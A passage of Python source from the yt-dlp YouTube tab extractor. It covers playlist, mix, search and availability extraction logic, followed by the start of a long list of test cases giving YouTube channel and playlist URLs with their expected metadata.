'channel_url': metadata['uploader_url']})
return self.playlist_result(
self._entries(
selected_tab, playlist_id, ytcfg,
self._extract_account_syncid(ytcfg, data),
self._extract_visitor_data(data, ytcfg)),
**metadata)
def _extract_mix_playlist(self, playlist, playlist_id, data, ytcfg):
first_id = last_id = response = None
for page_num in itertools.count(1):
videos = list(self._playlist_entries(playlist))
if not videos:
return
start = next((i for i, v in enumerate(videos) if v['id'] == last_id), -1) + 1
if start >= len(videos):
return
for video in videos[start:]:
if video['id'] == first_id:
self.to_screen('First video %s found again; Assuming end of Mix' % first_id)
return
yield video
first_id = first_id or videos[0]['id']
last_id = videos[-1]['id']
watch_endpoint = try_get(
playlist, lambda x: x['contents'][-1]['playlistPanelVideoRenderer']['navigationEndpoint']['watchEndpoint'])
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=self._extract_account_syncid(ytcfg, data),
visitor_data=self._extract_visitor_data(response, data, ytcfg))
query = {
'playlistId': playlist_id,
'videoId': watch_endpoint.get('videoId') or last_id,
'index': watch_endpoint.get('index') or len(videos),
'params': watch_endpoint.get('params') or 'OAE%3D'
}
response = self._extract_response(
item_id='%s page %d' % (playlist_id, page_num),
query=query, ep='next', headers=headers, ytcfg=ytcfg,
check_get_keys='contents'
)
playlist = try_get(
response, lambda x: x['contents']['twoColumnWatchNextResults']['playlist']['playlist'], dict)
def _extract_from_playlist(self, item_id, url, data, playlist, ytcfg):
title = playlist.get('title') or try_get(
data, lambda x: x['titleText']['simpleText'], compat_str)
playlist_id = playlist.get('playlistId') or item_id
# Delegating everything except mix playlists to regular tab-based playlist URL
playlist_url = urljoin(url, try_get(
playlist, lambda x: x['endpoint']['commandMetadata']['webCommandMetadata']['url'],
compat_str))
if playlist_url and playlist_url != url:
return self.url_result(
playlist_url, ie=YoutubeTabIE.ie_key(), video_id=playlist_id,
video_title=title)
return self.playlist_result(
self._extract_mix_playlist(playlist, playlist_id, data, ytcfg),
playlist_id=playlist_id, playlist_title=title)
def _extract_availability(self, data):
"""
Gets the availability of a given playlist/tab.
Note: Unless YouTube tells us explicitly, we do not assume it is public
@param data: response
"""
is_private = is_unlisted = None
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer') or {}
badge_labels = self._extract_badges(renderer)
# Personal playlists, when authenticated, have a dropdown visibility selector instead of a badge
privacy_dropdown_entries = try_get(
renderer, lambda x: x['privacyForm']['dropdownFormFieldRenderer']['dropdown']['dropdownRenderer']['entries'], list) or []
for renderer_dict in privacy_dropdown_entries:
is_selected = try_get(
renderer_dict, lambda x: x['privacyDropdownItemRenderer']['isSelected'], bool) or False
if not is_selected:
continue
label = self._get_text(renderer_dict, ('privacyDropdownItemRenderer', 'label'))
if label:
badge_labels.add(label.lower())
break
for badge_label in badge_labels:
if badge_label == 'unlisted':
is_unlisted = True
elif badge_label == 'private':
is_private = True
elif badge_label == 'public':
is_unlisted = is_private = False
return self._availability(is_private, False, False, False, is_unlisted)
@staticmethod
def _extract_sidebar_info_renderer(data, info_renderer, expected_type=dict):
sidebar_renderer = try_get(
data, lambda x: x['sidebar']['playlistSidebarRenderer']['items'], list) or []
for item in sidebar_renderer:
renderer = try_get(item, lambda x: x[info_renderer], expected_type)
if renderer:
return renderer
def _reload_with_unavailable_videos(self, item_id, data, ytcfg):
"""
Get playlist with unavailable videos if the 'show unavailable videos' button exists.
"""
browse_id = params = None
renderer = self._extract_sidebar_info_renderer(data, 'playlistSidebarPrimaryInfoRenderer')
if not renderer:
return
menu_renderer = try_get(
renderer, lambda x: x['menu']['menuRenderer']['items'], list) or []
for menu_item in menu_renderer:
if not isinstance(menu_item, dict):
continue
nav_item_renderer = menu_item.get('menuNavigationItemRenderer')
text = try_get(
nav_item_renderer, lambda x: x['text']['simpleText'], compat_str)
if not text or text.lower() != 'show unavailable videos':
continue
browse_endpoint = try_get(
nav_item_renderer, lambda x: x['navigationEndpoint']['browseEndpoint'], dict) or {}
browse_id = browse_endpoint.get('browseId')
params = browse_endpoint.get('params')
break
headers = self.generate_api_headers(
ytcfg=ytcfg, account_syncid=self._extract_account_syncid(ytcfg, data),
visitor_data=self._extract_visitor_data(data, ytcfg))
query = {
'params': params or 'wgYCCAA=',
'browseId': browse_id or 'VL%s' % item_id
}
return self._extract_response(
item_id=item_id, headers=headers, query=query,
check_get_keys='contents', fatal=False, ytcfg=ytcfg,
note='Downloading API JSON with unavailable videos')
def _extract_webpage(self, url, item_id, fatal=True):
retries = self.get_param('extractor_retries', 3)
count = -1
webpage = data = last_error = None
while count < retries:
count += 1
# Sometimes youtube returns a webpage with incomplete ytInitialData
# See: https://github.com/yt-dlp/yt-dlp/issues/116
if last_error:
self.report_warning('%s. Retrying ...' % last_error)
try:
webpage = self._download_webpage(
url, item_id,
note='Downloading webpage%s' % (' (retry #%d)' % count if count else '',))
data = self.extract_yt_initial_data(item_id, webpage or '', fatal=fatal) or {}
except ExtractorError as e:
if isinstance(e.cause, network_exceptions):
if not isinstance(e.cause, compat_HTTPError) or e.cause.code not in (403, 429):
last_error = error_to_compat_str(e.cause or e.msg)
if count < retries:
continue
if fatal:
raise
self.report_warning(error_to_compat_str(e))
break
else:
try:
self._extract_and_report_alerts(data)
except ExtractorError as e:
if fatal:
raise
self.report_warning(error_to_compat_str(e))
break
if dict_get(data, ('contents', 'currentVideoEndpoint', 'onResponseReceivedActions')):
break
last_error = 'Incomplete yt initial data received'
if count >= retries:
if fatal:
raise ExtractorError(last_error)
self.report_warning(last_error)
break
return webpage, data
def _extract_data(self, url, item_id, ytcfg=None, fatal=True, webpage_fatal=False, default_client='web'):
data = None
if 'webpage' not in self._configuration_arg('skip'):
webpage, data = self._extract_webpage(url, item_id, fatal=webpage_fatal)
ytcfg = ytcfg or self.extract_ytcfg(item_id, webpage)
# Reject webpage data if redirected to home page without explicitly requesting
selected_tab = self._extract_selected_tab(traverse_obj(
data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list, default=[]), fatal=False) or {}
if (url != 'https://www.youtube.com/feed/recommended'
and selected_tab.get('tabIdentifier') == 'FEwhat_to_watch' # Home page
and 'no-youtube-channel-redirect' not in self.get_param('compat_opts', [])):
msg = 'The channel/playlist does not exist and the URL redirected to youtube.com home page'
if fatal:
raise ExtractorError(msg, expected=True)
self.report_warning(msg, only_once=True)
if not data:
if not ytcfg and self.is_authenticated:
msg = 'Playlists that require authentication may not extract correctly without a successful webpage download.'
if 'authcheck' not in self._configuration_arg('skip') and fatal:
raise ExtractorError(
msg + ' If you are not downloading private content, or your cookies are only for the first account and channel,'
' pass "--extractor-args youtubetab:skip=authcheck" to skip this check',
expected=True)
self.report_warning(msg, only_once=True)
data = self._extract_tab_endpoint(url, item_id, ytcfg, fatal=fatal, default_client=default_client)
return data, ytcfg
def _extract_tab_endpoint(self, url, item_id, ytcfg=None, fatal=True, default_client='web'):
headers = self.generate_api_headers(ytcfg=ytcfg, default_client=default_client)
resolve_response = self._extract_response(
item_id=item_id, query={'url': url}, check_get_keys='endpoint', headers=headers, ytcfg=ytcfg, fatal=fatal,
ep='navigation/resolve_url', note='Downloading API parameters API JSON', default_client=default_client)
endpoints = {'browseEndpoint': 'browse', 'watchEndpoint': 'next'}
for ep_key, ep in endpoints.items():
params = try_get(resolve_response, lambda x: x['endpoint'][ep_key], dict)
if params:
return self._extract_response(
item_id=item_id, query=params, ep=ep, headers=headers,
ytcfg=ytcfg, fatal=fatal, default_client=default_client,
check_get_keys=('contents', 'currentVideoEndpoint', 'onResponseReceivedActions'))
err_note = 'Failed to resolve url (does the playlist exist?)'
if fatal:
raise ExtractorError(err_note, expected=True)
self.report_warning(err_note, item_id)
_SEARCH_PARAMS = None
def _search_results(self, query, params=NO_DEFAULT, default_client='web'):
data = {'query': query}
if params is NO_DEFAULT:
params = self._SEARCH_PARAMS
if params:
data['params'] = params
content_keys = (
('contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'sectionListRenderer', 'contents'),
('onResponseReceivedCommands', 0, 'appendContinuationItemsAction', 'continuationItems'),
# ytmusic search
('contents', 'tabbedSearchResultsRenderer', 'tabs', 0, 'tabRenderer', 'content', 'sectionListRenderer', 'contents'),
('continuationContents', ),
)
check_get_keys = tuple(set(keys[0] for keys in content_keys))
continuation_list = [None]
for page_num in itertools.count(1):
data.update(continuation_list[0] or {})
search = self._extract_response(
item_id='query "%s" page %s' % (query, page_num), ep='search', query=data,
default_client=default_client, check_get_keys=check_get_keys)
slr_contents = traverse_obj(search, *content_keys)
yield from self._extract_entries({'contents': list(variadic(slr_contents))}, continuation_list)
if not continuation_list[0]:
break
class YoutubeTabIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube Tabs'
_VALID_URL = r'''(?x:
https?://
(?:\w+\.)?
(?:
youtube(?:kids)?\.com|
%(invidious)s
)/
(?:
(?P<channel_type>channel|c|user|browse)/|
(?P<not_channel>
feed/|hashtag/|
(?:playlist|watch)\?.*?\blist=
)|
(?!(?:%(reserved_names)s)\b) # Direct URLs
)
(?P<id>[^/?\#&]+)
)''' % {
'reserved_names': YoutubeBaseInfoExtractor._RESERVED_NAMES,
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
IE_NAME = 'youtube:tab'
_TESTS = [{
'note': 'playlists, multipage',
'url': 'https://www.youtube.com/c/ИгорьКлейнер/playlists?view=1&flow=grid',
'playlist_mincount': 94,
'info_dict': {
'id': 'UCqj7Cz7revf5maW9g5pgNcg',
'title': 'Igor Kleiner - Playlists',
'description': 'md5:be97ee0f14ee314f1f002cf187166ee2',
'uploader': 'Igor Kleiner',
'uploader_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'channel': 'Igor Kleiner',
'channel_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'tags': ['"критическое', 'мышление"', '"наука', 'просто"', 'математика', '"анализ', 'данных"'],
'channel_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'uploader_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'channel_follower_count': int
},
}, {
'note': 'playlists, multipage, different order',
'url': 'https://www.youtube.com/user/igorkle1/playlists?view=1&sort=dd',
'playlist_mincount': 94,
'info_dict': {
'id': 'UCqj7Cz7revf5maW9g5pgNcg',
'title': 'Igor Kleiner - Playlists',
'description': 'md5:be97ee0f14ee314f1f002cf187166ee2',
'uploader_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'uploader': 'Igor Kleiner',
'uploader_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'tags': ['"критическое', 'мышление"', '"наука', 'просто"', 'математика', '"анализ', 'данных"'],
'channel_id': 'UCqj7Cz7revf5maW9g5pgNcg',
'channel': 'Igor Kleiner',
'channel_url': 'https://www.youtube.com/channel/UCqj7Cz7revf5maW9g5pgNcg',
'channel_follower_count': int
},
}, {
'note': 'playlists, series',
'url': 'https://www.youtube.com/c/3blue1brown/playlists?view=50&sort=dd&shelf_id=3',
'playlist_mincount': 5,
'info_dict': {
'id': 'UCYO_jab_esuFRV4b17AJtAw',
'title': '3Blue1Brown - Playlists',
'description': 'md5:e1384e8a133307dd10edee76e875d62f',
'uploader_id': 'UCYO_jab_esuFRV4b17AJtAw',
'uploader': '3Blue1Brown',
'channel_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'uploader_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'channel': '3Blue1Brown',
'channel_id': 'UCYO_jab_esuFRV4b17AJtAw',
'tags': ['Mathematics'],
'channel_follower_count': int
},
}, {
'note': 'playlists, singlepage',
'url': 'https://www.youtube.com/user/ThirstForScience/playlists',
'playlist_mincount': 4,
'info_dict': {
'id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'title': 'ThirstForScience - Playlists',
'description': 'md5:609399d937ea957b0f53cbffb747a14c',
'uploader': 'ThirstForScience',
'uploader_id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'uploader_url': 'https://www.youtube.com/channel/UCAEtajcuhQ6an9WEzY9LEMQ',
'channel_url': 'https://www.youtube.com/channel/UCAEtajcuhQ6an9WEzY9LEMQ',
'channel_id': 'UCAEtajcuhQ6an9WEzY9LEMQ',
'tags': 'count:13',
'channel': 'ThirstForScience',
'channel_follower_count': int
}
}, {
'url': 'https://www.youtube.com/c/ChristophLaimer/playlists',
'only_matching': True,
}, {
'note': 'basic, single video playlist',
'url': 'https://www.youtube.com/playlist?list=PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'info_dict': {
'uploader_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader': 'Sergey M.',
'id': 'PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'title': 'youtube-dl public playlist',
'description': '',
'tags': [],
'view_count': int,
'modified_date': '20201130',
'channel': 'Sergey M.',
'channel_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'channel_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
},
'playlist_count': 1,
}, {
'note': 'empty playlist',
'url': 'https://www.youtube.com/playlist?list=PL4lCao7KL_QFodcLWhDpGCYnngnHtQ-Xf',
'info_dict': {
'uploader_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'uploader': 'Sergey M.',
'id': 'PL4lCao7KL_QFodcLWhDpGCYnngnHtQ-Xf',
'title': 'youtube-dl empty playlist',
'tags': [],
'channel': 'Sergey M.',
'description': '',
'modified_date': '20160902',
'channel_id': 'UCmlqkdCBesrv2Lak1mF_MxA',
'channel_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'uploader_url': 'https://www.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
},
'playlist_count': 0,
}, {
'note': 'Home tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/featured',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Home',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'tags': ['bible', 'history', 'prophesy'],
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_follower_count': int
},
'playlist_mincount': 2,
}, {
'note': 'Videos tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/videos',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Videos',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_follower_count': int
},
'playlist_mincount': 975,
}, {
'note': 'Videos tab, sorted by popular',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/videos?view=0&sort=p&flow=grid',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Videos',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'tags': ['bible', 'history', 'prophesy'],
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_follower_count': int
},
'playlist_mincount': 199,
}, {
'note': 'Playlists tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/playlists',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Playlists',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 17,
}, {
'note': 'Community tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/community',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Community',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 18,
}, {
'note': 'Channels tab',
'url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w/channels',
'info_dict': {
'id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'title': 'lex will - Channels',
'description': 'md5:2163c5d0ff54ed5f598d6a7e6211e488',
'uploader': 'lex will',
'uploader_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'uploader_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel': 'lex will',
'channel_url': 'https://www.youtube.com/channel/UCKfVa3S1e4PHvxWcwyMMg8w',
'channel_id': 'UCKfVa3S1e4PHvxWcwyMMg8w',
'tags': ['bible', 'history', 'prophesy'],
'channel_follower_count': int
},
'playlist_mincount': 12,
}, {
'note': 'Search tab',
'url': 'https://www.youtube.com/c/3blue1brown/search?query=linear%20algebra',
'playlist_mincount': 40,
'info_dict': {
'id': 'UCYO_jab_esuFRV4b17AJtAw',
'title': '3Blue1Brown - Search - linear algebra',
'description': 'md5:e1384e8a133307dd10edee76e875d62f',
'uploader': '3Blue1Brown',
'uploader_id': 'UCYO_jab_esuFRV4b17AJtAw',
'channel_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'uploader_url': 'https://www.youtube.com/channel/UCYO_jab_esuFRV4b17AJtAw',
'tags': ['Mathematics'],
'channel': '3Blue1Brown',
'channel_id': 'UCYO_jab_esuFRV4b17AJtAw',
'channel_follower_count': int
},
}, {
'url': 'https://invidio.us/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'url': 'https://www.youtubekids.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'url': 'https://music.youtube.com/channel/UCmlqkdCBesrv2Lak1mF_MxA',
'only_matching': True,
}, {
'note': 'Playlist with deleted videos (#651). As a bonus, the video #51 is also twice in this list.',
'url': 'https://www.youtube.com/playlist?list=PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'info_dict': {
'title': '29C3: Not my department',
'id': 'PLwP_SiAcdui0KVebT0mU9Apz359a4ubsC',
'uploader': 'Christiaan008',
'uploader_id': 'UCEPzS1rYsrkqzSLNp76nrcg',
'description': 'md5:a14dc1a8ef8307a9807fe136a0660268',
'tags': [],
'uploader_url': 'https://www.youtube.com/c/ChRiStIaAn008',
'view_count': int,
'modified_date': '20150605',
'channel_id': 'UCEPzS1rYsrkqzSLNp76nrcg',
'channel_url': 'https://www.youtube.com/c/ChRiStIaAn008',
'channel': 'Christiaan008',
},
'playlist_count': 96,
}, {
'note': 'Large playlist',
'url': 'https://www.youtube.com/playlist?list=UUBABnxM4Ar9ten8Mdjj1j0Q',
'info_dict': {
'title': 'Uploads from Cauchemar',
'id': 'UUBABnxM4Ar9ten8Mdjj1j0Q',
'uploader': 'Cauchemar',
'uploader_id': 'UCBABnxM4Ar9ten8Mdjj1j0Q',
'channel_url': 'https://www.youtube.com/c/Cauchemar89',
'tags': [],
'modified_date': r're:\d{8}',
'channel': 'Cauchemar',
'uploader_url': 'https://www.youtube.com/c/Cauchemar89',
'view_count': int,
'description': '',
'channel_id': 'UCBABnxM4Ar9ten8Mdjj1j0Q',
},
'playlist_mincount': 1123,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'even larger playlist, 8832 videos',
'url': 'http://www.youtube.com/user/NASAgovVideo/videos',
'only_matching': True,
}, {
'note': 'Buggy playlist: the webpage has a "Load more" button but it doesn\'t have more videos',
'url': 'https://www.youtube.com/playlist?list=UUXw-G3eDE9trcvY2sBMM_aA',
'info_dict': {
'title': 'Uploads from Interstellar Movie',
'id': 'UUXw-G3eDE9trcvY2sBMM_aA',
'uploader': 'Interstellar Movie',
'uploader_id': 'UCXw-G3eDE9trcvY2sBMM_aA',
'uploader_url': 'https://www.youtube.com/c/InterstellarMovie',
'tags': [],
'view_count': int,
'channel_id': 'UCXw-G3eDE9trcvY2sBMM_aA',
'channel_url': 'https://www.youtube.com/c/InterstellarMovie',
'channel': 'Interstellar Movie',
'description': '',
'modified_date': r're:\d{8}',
},
'playlist_mincount': 21,
}, {
'note': 'Playlist with "show unavailable videos" button',
'url': 'https://www.youtube.com/playlist?list=UUTYLiWFZy8xtPwxFwX9rV7Q',
'info_dict': {
'title': 'Uploads from Phim Siêu Nhân Nhật Bản',
'id': 'UUTYLiWFZy8xtPwxFwX9rV7Q',
'uploader': 'Phim Siêu Nhân Nhật Bản',
'uploader_id': 'UCTYLiWFZy8xtPwxFwX9rV7Q',
'view_count': int,
'channel': 'Phim Siêu Nhân Nhật Bản',
'tags': [],
'uploader_url': 'https://www.youtube.com/channel/UCTYLiWFZy8xtPwxFwX9rV7Q',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UCTYLiWFZy8xtPwxFwX9rV7Q',
'channel_id': 'UCTYLiWFZy8xtPwxFwX9rV7Q',
'modified_date': r're:\d{8}',
},
'playlist_mincount': 200,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'Playlist with unavailable videos in page 7',
'url': 'https://www.youtube.com/playlist?list=UU8l9frL61Yl5KFOl87nIm2w',
'info_dict': {
'title': 'Uploads from BlankTV',
'id': 'UU8l9frL61Yl5KFOl87nIm2w',
'uploader': 'BlankTV',
'uploader_id': 'UC8l9frL61Yl5KFOl87nIm2w',
'channel': 'BlankTV',
'channel_url': 'https://www.youtube.com/c/blanktv',
'channel_id': 'UC8l9frL61Yl5KFOl87nIm2w',
'view_count': int,
'tags': [],
'uploader_url': 'https://www.youtube.com/c/blanktv',
'modified_date': r're:\d{8}',
'description': '',
},
'playlist_mincount': 1000,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'https://github.com/ytdl-org/youtube-dl/issues/21844',
'url': 'https://www.youtube.com/playlist?list=PLzH6n4zXuckpfMu_4Ff8E7Z1behQks5ba',
'info_dict': {
'title': 'Data Analysis with Dr Mike Pound',
'id': 'PLzH6n4zXuckpfMu_4Ff8E7Z1behQks5ba',
'uploader_id': 'UC9-y-6csu5WGm29I7JiwpnA',
'uploader': 'Computerphile',
'description': 'md5:7f567c574d13d3f8c0954d9ffee4e487',
'uploader_url': 'https://www.youtube.com/user/Computerphile',
'tags': [],
'view_count': int,
'channel_id': 'UC9-y-6csu5WGm29I7JiwpnA',
'channel_url': 'https://www.youtube.com/user/Computerphile',
'channel': 'Computerphile',
},
'playlist_mincount': 11,
}, {
'url': 'https://invidio.us/playlist?list=PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'only_matching': True,
}, {
'note': 'Playlist URL that does not actually serve a playlist',
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'view_count': int,
'like_count': int,
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://www.youtubekids.com/watch?v=Agk7R8I8o5U&list=PUZ6jURNr1WQZCNHF0ao-c0g',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/channel/UCoMdktPbSTixAyNGwb-UYkQ/live',
'info_dict': {
'id': 'GgL890LIznQ', # This will keep changing
'ext': 'mp4',
'title': str,
'uploader': 'Sky News',
'uploader_id': 'skynews',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/skynews',
'upload_date': r're:\d{8}',
'description': str,
'categories': ['News & Politics'],
'tags': list,
'like_count': int,
'release_timestamp': 1642502819,
'channel': 'Sky News',
'channel_id': 'UCoMdktPbSTixAyNGwb-UYkQ',
'age_limit': 0,
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi/GgL890LIznQ/maxresdefault_live.jpg',
'playable_in_embed': True,
'release_date': '20220118',
'availability': 'public',
'live_status': 'is_live',
'channel_url': 'https://www.youtube.com/channel/UCoMdktPbSTixAyNGwb-UYkQ',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
'expected_warnings': ['Ignoring subtitle tracks found in '],
}, {
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
},
'params': {
'skip_download': True,
},
'only_matching': True,
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'note': 'A channel that is not live. Should raise error',
'url': 'https://www.youtube.com/user/numberphile/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/trending',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/library',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/history',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/subscriptions',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/watch_later',
'only_matching': True,
}, {
'note': 'Recommended - redirects to home page.',
'url': 'https://www.youtube.com/feed/recommended',
'only_matching': True,
}, {
'note': 'inline playlist with not always working continuations',
'url': 'https://www.youtube.com/watch?v=UC6u0Tct-Fo&list=PL36D642111D65BE7C',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/course',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/zsecurity',
'only_matching': True,
}, {
'url': 'http://www.youtube.com/NASAgovVideo/videos',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/hashtag/cctv9',
'info_dict': {
'id': 'cctv9',
'title': '#cctv9',
'tags': [],
},
'playlist_mincount': 350,
}, {
'url': 'https://www.youtube.com/watch?list=PLW4dVinRY435CBE_JD3t-0SRXKfnZHS1P&feature=youtu.be&v=M9cJMXmQ_ZU',
'only_matching': True,
}, {
'note': 'Requires Premium: should request additional YTM-info webpage (and have format 141) for videos in playlist',
'url': 'https://music.youtube.com/playlist?list=PLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'only_matching': True
}, {
'note': '/browse/ should redirect to /channel/',
'url': 'https://music.youtube.com/browse/UC1a8OFewdjuLq6KlF8M_8Ng',
'only_matching': True
}, {
'note': 'VLPL, should redirect to playlist?list=PL...',
'url': 'https://music.youtube.com/browse/VLPLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'info_dict': {
'id': 'PLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'uploader': 'NoCopyrightSounds',
'description': 'Providing you with copyright free / safe music for gaming, live streaming, studying and more!',
'uploader_id': 'UC_aEa8K-EOJ3D6gOs7HcyNg',
'title': 'NCS Releases',
'uploader_url': 'https://www.youtube.com/c/NoCopyrightSounds',
'channel_url': 'https://www.youtube.com/c/NoCopyrightSounds',
'modified_date': r're:\d{8}',
'view_count': int,
'channel_id': 'UC_aEa8K-EOJ3D6gOs7HcyNg',
'tags': [],
